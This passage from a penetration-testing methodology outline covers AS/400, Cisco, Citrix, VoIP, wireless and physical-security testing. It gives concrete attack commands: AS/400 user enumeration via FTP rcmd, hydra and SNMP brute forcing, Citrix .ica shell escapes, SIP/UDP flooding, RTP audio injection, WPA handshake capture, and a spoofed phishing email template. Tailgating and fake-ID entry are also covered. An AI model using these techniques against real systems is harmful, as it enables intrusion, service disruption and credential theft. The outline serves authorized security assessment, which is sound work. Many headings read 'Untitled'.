19.1.1. Information Gathering Nmap using common iSeries (AS/400) services. Unsecured services (Port;name;description) Secured services (Port;name;description) NetCat (old school technique) nc -v -z -w target ListOfServices.txt | grep "open" Banners Grabbing Telnet FTP HTTP Banner POP3 SNMP SMTP

19.1.2. Users Enumeration Default AS/400 users accounts Error messages Telnet Login errors POP3 authentication Errors Qsys symbolic link (if ftp is enabled) ftp target | quote stat | quote site namefmt 1 cd / quote site listfmt 1 mkdir temp quote rcmd ADDLNK OBJ('/qsys.lib') NEWLNK('/temp/qsys') quote rcmd QSH CMD('ln -fs /qsys.lib /temp/qsys') dir /temp/qsys/*.usrprf LDAP Need os400-sys value from ibm-slapdSuffix Tool to browse LDAP

19.1.3. Exploitation CVE References CVE-2005-1244 - Severity : High - CVSS : 7.0 CVE-2005-1243 - Severity : Low - CVSS : 3.3 CVE-2005-1242 - Severity : Low - CVSS : 3.3 CVE-2005-1241 - Severity : High - CVSS : 7.0 CVE-2005-1240 - Severity : High - CVSS : 7.0 CVE-2005-1239 - Severity : Low - CVSS : 3.3 CVE-2005-1238 - Severity : High - CVSS : 9.0 CVE-2005-1182 - Severity : Low - CVSS : 3.3 CVE-2005-1133 - Severity : Low - CVSS : 3.3 CVE-2005-1025 - Severity : Low - CVSS : 3.3 CVE-2005-0868 - Severity : High - CVSS : 7.0 CVE-2005-0899 - Severity : Low - CVSS : 2.3 CVE-2002-1822 - Severity : Low - CVSS : 3.3 CVE-2002-1731 - Severity : Low - CVSS : 2.3 CVE-2000-1038 - Severity : Low - CVSS : 3.3 CVE-1999-1279 - Severity : Low - CVSS : 3.3 CVE-1999-1012 - Severity : Low - CVSS : 3.3 Access with Work Station Gateway http://target:5061/WSG Default AS/400 accounts. Network attacks (next release) DB2 QSHELL Hijacking Terminals Trojan attacks Hacking from AS/400

19.2. Local

19.2.1. System Value Security Untitled Untitled Untitled Untitled Untitled Untitled Untitled Recommended value is 30

19.2.2. Password Policy Untitled Untitled Untitled Untitled Untitled Untitled Untitled Untitled Untitled

19.2.3. Audit level Untitled Recommended value is *SECURITY

19.2.4. Documentation Users class Untitled System Audit Settings Untitled Special Authorities Definitions Untitled

20. Bluetooth Specific Testing

20.1. Bluescanner

20.2. Bluesweep

20.3. btscanner

20.4. Redfang

20.5. Blueprint

20.6. Bluesnarfer

20.7. Bluebugger

20.7.1. bluebugger [OPTIONS] -a <addr> [MODE]

20.8. Blueserial

20.9. Bloover

20.10. Bluesniff

20.11. Exploit Frameworks

20.11.1. BlueMaho Untitled

20.12. Resources

20.12.1. URL's Bluejackers bluetooth-pentest Trifinite

20.12.2. Vulnerability Information Common Vulnerabilities and Exploits (CVE) Vulnerabilties and exploit information relating to these products can be found here:

20.12.3. White Papers Bluesnarfing

21. Cisco Specific Testing

21.1. Methodology

21.1.1. Scan & Fingerprint. Untitled Untitled If SNMP is active, then community string guessing should be performed.

21.1.2. Credentials Guessing. Untitled Attempt to guess Telnet, HTTP and SSH account credentials. Once you have non-privileged access, attempt to discover the 'enable' password. Also attempt to guess Simple Network Management Protocol (SNMP) community strings as they can lead to the config files of the router and therefore the 'enable' password!

21.1.3. Connect Untitled If you have determined the 'enable' password, then full access has been achieved and you can alter the configuration files of the router.

21.1.4. Check for bugs Untitled The most widely knwon/ used are: Nessus, Retina, GFI LanGuard and Core Impact. There are also tools that check for specific flaws, such as the HTTP Arbitrary Access Bug: ios-w3-vuln

21.1.5. Further your attack Untitled running-config is the currently running configuration settings.  This gets loaded from the startup-config on boot.  This configuration file is editable and the changes are immediate.  Any changes will be lost once the router is rebooted.  It is this file that requires altering to maintain a non-permenant connection through to the internal network. startup-config is the boot up configuration file.  It is this file that needs altering to maintain a permenant  connection through to the internal network. Untitled #> access-list 100 permit ip <IP> any

21.2. Scan & Fingerprint.

21.2.1. Port Scanning nmap Untitled Other tools Untitled mass-scanner is a simple scanner for discovering Cisco devices within a given network range.

21.2.2. Fingerprinting Untitled BT cisco-torch-0.4b # -A Untitled TCP Port scan - nmap -sV -O -v -p 23,80 <IP> -oN TCP.version.txt Untitled

21.3. Password Guessing.

21.3.1. Untitled ./CAT  -h  <IP>  -a  password.wordlist Untitled

21.3.2. Untitled ./enabler <IP> [-u username] -p password /password.wordlist [port] Untitled

21.3.3. Untitled BT tmp # hydra  -l  ""  -P  password.wordlist  -t  4  <IP>  cisco Untitled

21.4. SNMP Attacks.

21.4.1. Untitled ./CAT  -h  <IP>  -w  SNMP.wordlist Untitled

21.4.2. Untitled onesixytone  -c  SNMP.wordlist  <IP> BT onesixtyone-0.3.2 # onesixtyone  -c  dict.txt Scanning 1 hosts, 64 communities [enable] Cisco Internetwork Operating System Software   IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1)  Technical Support:  Copyright (c) 1986-2005 by cisco Systems, Inc.  Compiled Fri 12-Aug [Cisco] Cisco Internetwork Operating System Software   IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1)  Technical Support:  Copyright (c) 1986-2005 by cisco Systems, Inc.  Compiled Fri 12-Aug

21.4.3. Untitled snmapwalk  -v  <Version>  -c  <Community string>  <IP> Untitled

21.5. Connecting.

21.5.1. Telnet Untitled  telnet  <IP> Sample Banners

21.5.2. SSH

21.5.3. Web Browser Untitled This uses a combination of username and password to authenticate.  After browsing to the target device, an "Authentication Required" box will pop up with text similar to the following: Authentication Required Enter username and password for "level_15_access" at User Name: Password: Once logged in, you have non-privileged mode access and can even configure the router through a command interpreter.

21.5.4. TFTP Untitled Untitled ios-w3-vuln exploits the HTTP Access Bug to 'fetch' the running-config to your local TFTP server.  Both of these tools require the config files to be saved with default names. Untitled ./ <options> <IP,hostname,network> ./ <options> -F <hostlist> Creating backdoors in Cisco IOS using TCL

21.6. Known Bugs.

21.6.1. Attack Tools Untitled Untitled Untitled Web browse to the Cisco device: http://<IP> Untitled Untitled Untitled Untitled ./ios-w3-vul fetch > /tmp/router.txt

21.6.2. Common Vulnerabilities and Exploits (CVE) Information Vulnerabilties and exploit information relating to these products can be found here:

21.7. Configuration Files.

21.7.1. Untitled Configuration files explained The line that reads "enable password router", where "router" is the password, is the TTY console password which is superceeded by the enable secret password for remote access. Untitled Untitled Password Encryption Utilised Untitled Configuration Testing Tools Nipper fwauto (Beta)

21.8. References.

21.8.1. Cisco IOS Exploitation Techniques

22. Citrix Specific Testing

22.1. Citrix provides remote access services to multiple users across a wide range of platforms. The following information I have put together which will hopefully help you conduct a vulnerability assessment/ penetration test against Citrix

22.2. Enumeration

22.2.1. web search Google (GHDB) ext:ica inurl:citrix/metaframexp/default/login.asp [WFClient] Password= filetype:ica inurl:citrix/metaframexp/default/login.asp? ClientDetection=On inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login" inurl:/Citrix/Nfuse17/ inurl:Citrix/MetaFrame/default/default.aspx Google Hacks (Author Discovered) filetype:ica Username= inurl:/Citrix/AccessPlatform/ inurl:LogonAgent/Login.asp inurl:/CITRIX/NFUSE/default/login.asp inurl:/Citrix/NFuse161/login.asp inurl:/Citrix/NFuse16 inurl:/Citrix/NFuse151/ allintitle:MetaFrame XP Login allintitle:MetaFrame Presentation Server Login inurl:Citrix/~bespoke_company_name~/default/login.aspx?ClientDetection=On allintitle:Citrix(R) NFuse(TM) Classic Login Yahoo originurlextension:ica

22.2.2. site search Manual review web page for useful information review source for web page

22.2.3. generic nmap -A -PN -p 80,443,1494 ip_address amap -bqv ip_address port_no.

22.2.4. citrix specific perl ip_address enum.js enum.js apps TCPBrowserAdress=ip_address connect.js connect.js TCPBrowserAdress=ip_address Application=advertised-application Citrix-pa-scan perl ip_address [timeout] > pas.wri pabrute.c ./pabrute pubapp list app_list ip_address

22.2.5. Default Ports TCP Citrix XML Service Advanced Management Console Citrix SSL Relay ICA sessions Server to server Management Console to server Session Reliability (Auto-reconnect) License Management Console License server UDP Clients to ICA browser service Server-to-server

22.2.6. nmap nse scripts citrix-enum-apps nmap -sU --script=citrix-enum-apps -p 1604 <host> citrix-enum-apps-xml nmap --script=citrix-enum-apps-xml -p 80,443 <host> citrix-enum-servers nmap -sU --script=citrix-enum-servers -p 1604 citrix-enum-servers-xml nmap --script=citrix-enum-servers-xml -p 80,443 <host> citrix-brute-xml nmap --script=citrix-brute-xml --script-args=userdb=<userdb>,passdb=<passdb>,ntdomain=<domain> -p 80,443 <host>

22.3. Scanning

22.3.1. Nessus Plugins CGI abuses CGI abuses : Cross Site Scripting (XSS) Misc. Service Detection Web Servers Windows

22.3.2. Nikto perl -host ip_address -port port_no. Untitled

22.4. Exploitation

22.4.1. Alter default .ica files InitialProgram=cmd.exe InitialProgram=explorer.exe

22.4.2. Enumerate and Connect For applications identified by Citrix-pa-scan Pas For published applications with a Citrix client when the master browser is non-public. Citrix-pa-proxy

22.5. Brute Force

22.5.1. bforce.js bforce.js TCPBrowserAddress=ip_address usernames=user1,user2 passwords=pass1,pass2 bforce.js HTTPBrowserAddress=ip_address userfile=file.txt passfile=file.txt Untitled

22.6. Review Configuration Files

22.6.1. Application server configuration file appsrv.ini Location World writeable Review other files Sample file

22.6.2. Program Neighborhood configuration file pn.ini Location Review other files Sample file

22.6.3. Citrix ICA client configuration file wfclient.ini Location

22.7. References

22.7.1. Vulnerabilities Art of Hacking Common Vulnerabilities and Exploits (CVE) Sample file Untitled OSVDB[vuln_title]=Citrix&search[text_type]=titles&search[s_date]=&search[e_date]=&search[refid]=&search[referencetypes]=&search[vendors]=&kthx=searchSecunia Secunia SecurityFocus

22.7.2. Support Citrix Knowledge Base Thinworld

22.7.3. Exploits Milw0rm Art of Hacking Citrix

22.7.4. Tools Resource Zip file containing the majority of tools mentioned in this article into a zip file for easy download/ access

23. Network Backbone

23.1. Generic Toolset

23.1.1. Wireshark (Formerly Ethereal) Passive Sniffing Usernames/Passwords Email FTP HTTP HTTPS RDP VOIP Other Filters ip.src == ip_address ip.dst == ip_address tcp.dstport == port_no. ! ip.addr == ip_address (ip.addr eq ip_address and ip.addr eq ip_address) and (tcp.port eq 1829 and tcp.port eq 1863)

23.1.2. Cain & Abel Active Sniffing ARP Cache Poisoning DNS Poisoning Routing Protocols

23.1.3. Cisco-Torch ./ <options> <IP,hostname,network> or ./ <options> -F <hostlist>

23.1.4. NTP-Fingerprint perl -t [ip_address]

23.1.5. Yersinia

23.1.6. p0f ./p0f [ -f file ] [ -i device ] [ -s file ] [ -o file ] [ -w file ] [ -Q sock ] [ -u user ] [ -FXVONDUKASCMRqtpvdlr ] [ -c size ] [ -T nn ] [ 'filter rule' ]

23.1.7. Manual Check (Credentials required)

23.1.8. MAC Spoofing mac address changer for windows macchanger Random Mac Address:- macchanger -r eth0 madmacs smac TMAC

24. Penetration - An exploit usually relates to the existence of some flaw or vulnerability in an application or operating system that if used could lead to privilege escalation or denial of service against the computer system that is being attacked. Exploits can be compiled and used manually or various engines exist that are essentially at the lowest level pre-compiled point and shoot tools. These engines do also have a number of other extra underlying features for more advanced users.

24.1. Password Attacks

24.1.1. Known Accounts Identified Passwords Unidentified Hashes

24.1.2. Default Accounts Identified Passwords Unidentified Hashes

24.2. Exploits

24.2.1. Successful Exploits Accounts Passwords Groups Other Details Services Backdoor Connectivity

24.2.2. Unsuccessful Exploits

24.2.3. Resources Securiteam Exploits are sorted by year and must be downloaded individually SecurityForest Updated via CVS after initial install GovernmentSecurity Need to create and account to obtain access Red Base Security Oracle Exploit site only Wireless Vulnerabilities & Exploits (WVE) Wireless Exploit Site PacketStorm Security Exploits downloadable by month and year but no indexing carried out. SecWatch Exploits sorted by year and month, download seperately SecurityFocus Exploits must be downloaded individually Metasploit Install and regualrly update via svn Milw0rm Exploit archived indexed and sorted by port download as a whole - The one to go for!

24.3. Tools

24.3.1. Metasploit Free Extra Modules local copy

24.3.2. Manual SQL Injection Understanding SQL Injection SQL Injection walkthrough SQL Injection by example Blind SQL Injection Advanced SQL Injection in SQL Server More Advanced SQL Injection Advanced SQL Injection in Oracle databases SQL Cheatsheets Untitled

24.3.3. SQL Power Injector

24.3.4. SecurityForest

24.3.5. SPI Dynamics WebInspect

24.3.6. Core Impact

24.3.7. Cisco Global Exploiter

24.3.8. PIXDos perl [ --device=interface ] [--source=IP] [--dest=IP] [--sourcemac=M AC] [--destmac=MAC] [--port=n]

24.3.9. CANVAS

24.3.10. Inguma

25. Server Specific Tests

25.1. Databases

25.1.1. Direct Access Interrogation MS SQL Server Ports Version osql Oracle Ports TNS Listener SQL Plus Default Account/Passwords Default SID's MySQL Ports Version Users/Passwords DB2 Informix Sybase Other

25.1.2. Scans Default Ports Non-Default Ports Instance Names Versions

25.1.3. Password Attacks Sniffed Passwords Cracked Passwords Hashes Direct Access Guesses

25.1.4. Vulnerability Assessment Automated Reports Vulnerabilities Manual Patch Levels Confirmed Vulnerabilities

25.2. Mail

25.2.1. Scans

25.2.2. Fingerprint Manual Automated

25.2.3. Spoofable Telnet spoof telnet target_IP 25helo target.commail from: [email protected] to: [email protected]: [email protected]: []X-Originating-Email: [[email protected]]MIME-Version: 1.0To: <[email protected]>From: < [email protected] >Subject: Important! Account check requiredContent-Type: text/htmlContent-Transfer-Encoding: 7bitDear Valued Customer,The corporate network has recently gone through a critical update to the Active Directory, we have done this to increase security of the network against hacker attacks to protect your private information. Due to this, you are required to log onto the following website with your current credentials to ensure that your account does not expire.Please go to the following website and log in with your account details. <a href=></a>Online Security Manager.Target [email protected]

25.2.4. Relays

25.3. VPN

25.3.1. Scanning 500 UDP IPSEC 1723 TCP PPTP 443 TCP/SSL nmap -sU -PN -p 500 ipsecscan

25.3.2. Fingerprinting ike-scan --showbackoff

25.3.3. PSK Crack ikeprobe sniff for responses with C&A or ikecrack

25.4. Web

25.4.1. Vulnerability Assessment Automated Reports Vulnerabilities Manual Patch Levels Confirmed Vulnerabilities

25.4.2. Permissions PUT /test.txt HTTP/1.0 CONNECT HTTP/1.0 POST HTTP/1.0Content-Type: text/plainContent-Length: 6

25.4.3. Scans

25.4.4. Fingerprinting Other HTTP Commands Modules File Extensions HTTPS Commands Commands File Extensions

25.4.5. Directory Traversal\

26. VoIP Security

26.1. Sniffing Tools

26.1.1. AuthTool

26.1.2. Cain & Abel

26.1.3. Etherpeek

26.1.4. NetDude

26.1.5. Oreka

26.1.6. PSIPDump

26.1.7. SIPomatic

26.1.8. SIPv6 Analyzer

26.1.9. UCSniff

26.1.10. VoiPong

26.1.11. VOMIT

26.1.12. Wireshark

26.1.13. WIST - Web Interface for SIP Trace

26.2. Scanning and Enumeration Tools

26.2.1. enumIAX

26.2.2. fping

26.2.3. IAX Enumerator

26.2.4. iWar

26.2.5. Nessus

26.2.6. Nmap

26.2.7. SIP Forum Test Framework (SFTF)

26.2.8. SIPcrack

26.2.9. sipflanker python 192.168.1-254

26.2.10. SIP-Scan

26.2.11. SIP.Tastic

26.2.12. SIPVicious

26.2.13. SiVuS

26.2.14. SMAP smap IP_Address/Subnet_Mask smap -o IP_Address/Subnet_Mask smap -l IP_Address

26.2.15. snmpwalk

26.2.16. VLANping

26.2.17. VoIPAudit

26.2.18. VoIP GHDB Entries

26.2.19. VoIP Voicemail Database

26.3. Packet Creation and Flooding Tools

26.3.1. H.323 Injection Files

26.3.2. H225regreject

26.3.3. IAXHangup

26.3.4. IAXAuthJack

26.3.5. IAX.Brute

26.3.6. IAXFlooder ./iaxflood sourcename destinationname numpackets

26.3.7. INVITE Flooder ./inviteflood interface target_user target_domain ip_address_target no_of_packets

26.3.8. kphone-ddos

26.3.9. RTP Flooder

26.3.10. rtpbreak

26.3.11. Scapy

26.3.12. Seagull

26.3.13. SIPBomber

26.3.14. SIPNess

26.3.15. SIPp

26.3.16. SIPsak Tracing paths: - sipsak -T -s sip:[email protected] Options request:- sipsak -vv -s sip:[email protected] Query registered bindings:- sipsak -I -C empty -a password -s sip:[email protected]

26.3.17. SIP-Send-Fun

26.3.18. SIPVicious

26.3.19. Spitter

26.3.20. TFTP Brute Force perl <tftpserver> <filelist> <maxprocesses>

26.3.21. UDP Flooder ./udpflood source_ip target_destination_ip src_port dest_port no_of_packets

26.3.22. UDP Flooder (with VLAN Support) ./udpflood source_ip target_destination_ip src_port dest_port TOS user_priority VLAN ID no_of_packets

26.3.23. Voiphopper

26.4. Fuzzing Tools

26.4.1. Asteroid

26.4.2. Codenomicon VoIP Fuzzers

26.4.3. Fuzzy Packet

26.4.4. Mu Security VoIP Fuzzing Platform

26.4.5. ohrwurm RTP Fuzzer

26.4.6. PROTOS H.323 Fuzzer

26.4.7. PROTOS SIP Fuzzer

26.4.8. SIP Forum Test Framework (SFTF)

26.4.9. Sip-Proxy

26.5. Signaling Manipulation Tools

26.5.1. AuthTool ./authtool captured_sip_msgs_file -d dictionary -r usernames_passwords -v

26.5.2. BYE Teardown

26.5.3. Check Sync Phone Rebooter

26.5.4. RedirectPoison

26.5.5. Registration Adder

26.5.6. Registration Eraser

26.5.7. Registration Hijacker

26.5.8. SIP-Kill

26.5.9. SIP-Proxy-Kill

26.5.10. SIP-RedirectRTP

26.5.11. vnak

26.6. Media Manipulation Tools

26.6.1. RTP InsertSound ./rtpinsertsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file

26.6.2. RTP MixSound ./rtpmixsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file

26.6.3. RTPProxy

26.6.4. RTPInject

26.7. Generic Software Suites

26.7.1. OAT Office Communication Server Tool Assessment

26.7.2. EnableSecurity VOIPPACK Note: - Add-on for Immunity Canvas

26.8. References

26.8.1. URL's Common Vulnerabilities and Exploits (CVE) Vulnerabilties and exploit information relating to these products can be found here: Default Passwords Hacking Exposed VoIP Tool Pre-requisites VoIPsa

26.8.2. White Papers An Analysis of Security Threats and Tools in SIP-Based VoIP Systems An Analysis of VoIP Security Threats and Tools Hacking VoIP Exposed Security testing of SIP implementations SIP Stack Fingerprinting and Stack Difference Attacks Two attacks against VoIP VoIP Attacks! VoIP Security Audit Program (VSAP)

26.8.3. Spirent ThreatEx

27. Wireless Penetration

27.1. Wireless Assessment. The following information should ideally be obtained/enumerated when carrying out your wireless assessment. All this information is needed to give the tester, (and hence, the customer), a clear and concise picture of the network you are assessing. A brief overview of the network during a pre-site meeting weith the customer should allow you to estimate the timescales required to carry the assessment out.

27.1.1. Site Map RF Map Lines of Sight Signal Coverage Physical Map Triangulate APs Satellite Imagery

27.1.2. Network Map MAC Filter Authorised MAC Addresses Reaction to Spoofed MAC Addresses Encryption Keys utilised WEP WPA/PSK 802.1x Access Points ESSID BSSIDs Wireless Clients MAC Addresses Intercepted Traffic

27.2. SipRogue

27.3. ./redirectpoison interface target_source_ip target_source_port "<contact_information i.e. sip:;line=xtrfgy>"

27.4. Wireless Toolkit

27.4.1. Wireless Discovery Aerosol Airfart Aphopper Apradar BAFFLE inSSIDer iWEPPro karma KisMAC-ng Kismet MiniStumbler Netstumbler Vistumbler Wellenreiter Wifi Hopper WirelessMon WiFiFoFum

27.4.2. Packet Capture Airopeek Airpcap Airtraf Apsniff Cain Commview Ettercap Netmon nmwifi Wireshark

27.4.3. EAP Attack tools eapmd5pass eapmd5pass -w dictionary_file -r eapmd5-capture.dump Untitled

27.4.4. Leap Attack Tools asleap thc leap cracker anwrap

27.4.5. WEP/ WPA Password Attack Tools Airbase Aircrack-ptw Aircrack-ng Airsnort cowpatty FiOS Wireless Key Calculator iWifiHack KisMAC-ng Rainbow Tables wep attack wep crack wzcook

27.4.6. Frame Generation Software Airgobbler airpwn Airsnarf Commview fake ap void 11 wifi tap wifitap -b <BSSID> [-o <iface>] [-i <iface> [-p] [-w <WEP key> [-k <key id>]] [-d [-v]] [-h] FreeRADIUS - Wireless Pwnage Edition

27.4.7. Mapping Software Online Mapping WIGLE Skyhook Tools Knsgem

27.4.8. File Format Conversion Tools ns1 recovery and conversion tool warbable warkizniz warkizniz04b.exe [kismet.csv] [kismet.gps] [ns1 filename] ivstools

27.4.9. IDS Tools WIDZ War Scanner Snort-Wireless AirDefense AirMagnet

27.5. WLAN discovery

27.5.1. Unencrypted WLAN Visible SSID Sniff for IP range Hidden SSID Deauth client

27.5.2. WEP encrypted WLAN Visible SSID WEPattack Hidden SSID Deauth client

27.5.3. WPA / WPA2 encrypted WLAN Deauth client Capture EAPOL handshake

27.5.4. LEAP encrypted WLAN Deauth client Break LEAP

27.5.5. 802.1x WLAN Create Rogue Access Point Airsnarf fake ap Hotspotter Karma Linux rogue AP

27.5.6. Resources URL's Russix Wireless Vulnerabilities and Exploits (WVE) White Papers Weaknesses in the Key Scheduling Algorithm of RC4 802.11b Firmware-Level Attacks Wireless Attacks from an Intrusion Detection Perspective Implementing a Secure Wireless Network for a Windows Environment Breaking 104 bit WEP in less than 60 seconds PEAP Shmoocon2008 Wright & Antoniewicz Active behavioral fingerprinting of wireless devices Common Vulnerabilities and Exploits (CVE) Vulnerabilties and exploit information relating to these products can be found here:

28. Physical Security

28.1. Building Security

28.1.1. Meeting Rooms Check for active network jacks. Check for any information in room.

28.1.2. Lobby Check for active network jacks. Does receptionist/guard leave lobby? Accessbile printers? Print test page. Obtain phone/personnel listing.

28.1.3. Communal Areas Check for active network jacks. Check for any information in room. Listen for employee conversations.

28.1.4. Room Security Resistance of lock to picking. What type of locks are used in building? Pin tumblers, padlocks, abinet locks, dimple keys, proximity sensors? Ceiling access areas. Can you enter the ceiling space (above a suspended ceiling) and enter secured rooms?

28.1.5. Windows Check windows/doors for visible intruderalarm sensors. Check visible areas for sensitive information. Can you video users logging on?

28.2. Perimeter Security

28.2.1. Fence Security Attempt to verify that the whole of the perimeter fence is unbroken.

28.2.2. Exterior Doors If there is no perimeter fence, then determineif exterior doors are secured, guarded andmonitored etc.

28.2.3. Guards Patrol Routines Analyse patrol timings to ascertain if any holes exist in the coverage. Communications Intercept and analyse guard communications. Determine if the communication methods can be used to aid a physial intrusion.

28.3. Entry Points

28.3.1. Guarded Doors Piggybacking Attempt to closely follow employees into thebuilding without having to show valid credentials. Fake ID Attempt to use fake ID to gain access. Access Methods Test 'out of hours' entry methods

28.3.2. Unguarded Doors Identify all unguardedentry points. Are doors secured? Check locks for resistance to lock picking.

28.3.3. Windows Check windows/doors for visible intruderalarm sensors. Attempt to bypass sensors.

28.4. Office Waste

28.4.1. Dumpster DivingAttempt to retrieve any useful information from ToE refuse. This may include : printed documents, books, manuals, laptops, PDA's, USB memory devices, CD's, Floppy discs etc

29. Final Report - template

30. Contributors

30.1. Matt Byrne (

30.1.1. Matt contributed the majority of the Wireless section.

30.2. Arvind Doraiswamy (

30.2.1. Arvind kindly contributed to the associated MySQL section when coming across TCP Port 3306 open.

30.3. Lee Lawson (

30.3.1. Lee contributed the majority of the Cisco and Social Engineering sections.

30.4. Nabil OUCHN (